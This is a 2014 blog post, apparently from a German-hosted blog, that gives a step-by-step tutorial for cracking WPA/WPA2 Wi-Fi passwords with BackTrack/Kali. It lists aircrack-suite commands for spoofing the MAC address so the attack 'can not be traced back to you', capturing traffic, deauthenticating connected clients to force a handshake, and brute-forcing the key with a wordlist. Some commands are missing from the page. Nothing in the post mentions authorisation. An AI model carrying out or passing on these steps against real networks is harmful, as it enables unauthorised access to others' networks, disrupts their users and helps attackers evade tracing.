Samstag, 6. September 2014

WPA / WPA2 cracking [BackTrack]-KaliLinux

Here I will explain how to crack a WPA or WPA2 network. 

With the linuxdistro called BackTrack 5 from following link



• Backtrack on CD or USB 

• Computer compatible with 802.11 WLAN Card 

• Wireless Access point or WIFI router WPA / WPA2 encryption used 

• A Word List (use google u find many) 


1.BackTrack Start 

Boot your USB stick or your CD / DVD (depending on which BackTrack version you are) 

Now start BackTrack. 

After the boot process is finished you have to type:


and then:


Enter to access the Graphical interface of BackTrack. 


2.Now we start! 

Open a shell. 

Here type:


one to find out how your wifi adapter is called. 


3.Change the Mac 

Now you know the name of your adapter. (in my case it is wlan0, so I use from now on wlan0 as interface.) 

You should change your Mac address that can not be traced back to you later.

Code below:

airmon-ng stop wlan0 

ifconfig wlan0 down 

macchanger --mac (any mac) wlan0 

airmon-ng start wlan0 

It should look like this: 

airmon-ng stop wlan0 

ifconfig wlan0 down 

macchanger --mac 00: 11: 22: 33: 44: 55 wlan0 

airmon-ng start wlan0 


4.Choose Network

Now you type in the same shell:


Now the networks are looking for. 

On the left we see the BSSID something like the Mac from the router. 

If the wished network found, we press Ctrl + C to stop the whole process 

Now you copy the BSSID of the desired network.

5.Lets Go

Now you have to find the Channel


airodump-ng-c (channel) -w (filename does not matter what just take wpa or what is easy to remember.) --bssid (BSSID) wlan0 

we write our received data in a file. 

For example: 

airodump-ng-c 11 -w wpa --bssid 00: 14: F8: 4F: 14: 1A wlan0 

With this command we will write our wifi network XY with the BSSID 00: 14: F8: 4F: 14: 1A 

sending on Channel 11, all received data in the file 'wpa-01.cap' 

On WPA/WPA2 its not possible to decrypt the password,like on WEP. 

For this we need a 'handshake'. 


6.The handshake 

Our client is connected to the router ,which send with every new application the password in encrypted manner.

We might wait a (likely) forever to get our client reconnects.

But we must not.

In our shell we see below who else is online. If we get a handshake,

we see the top right in the shell. There is then 'handshake'. 

We now open a new shell to our clients throw out that he needs to reconnect. 

And type: 

aireplay-ng -0 5 -a (BSSID) wlan0 

5 is the number of tries we want to try all. 

But it is not mandatory that all works because newer routers dont allow this anymore. 

How do we get the client to disconect?

Is relatively simple. We tell the router: "Hello I'm user XY and would like like to log out." 

So we throw the client out:  

aireplay-ng -0 1 -a (BSSID)-c (Mac client) wlan0 

The Mac client we see below in shell1. 

Now we should have a handshake. 


7.Crack it! 

If we have a handshake, we can undisturbed close all our shells, and open a new one. 

In this we type: 

aircrack-ng (filename) -01.cap 

Now we need the wordlist

We now go to our Word List which is for example here. 

/ home / wordlists 

In my example, is called the Word List 'Wlist.txt'. 

Now we enter the following in the Shell:

aircrack-ng (filename) -01.cap -w (path to the Word List) 

with me Would it look like this:

aircrack-ng wpa-01.cap -w /home/wordlists/Wlist.txt 

Now the program tests all words if they match the encrypted handshake. 

If the password is found, it will be shown and youre done.




Keine Kommentare:

Kommentar veröffentlichen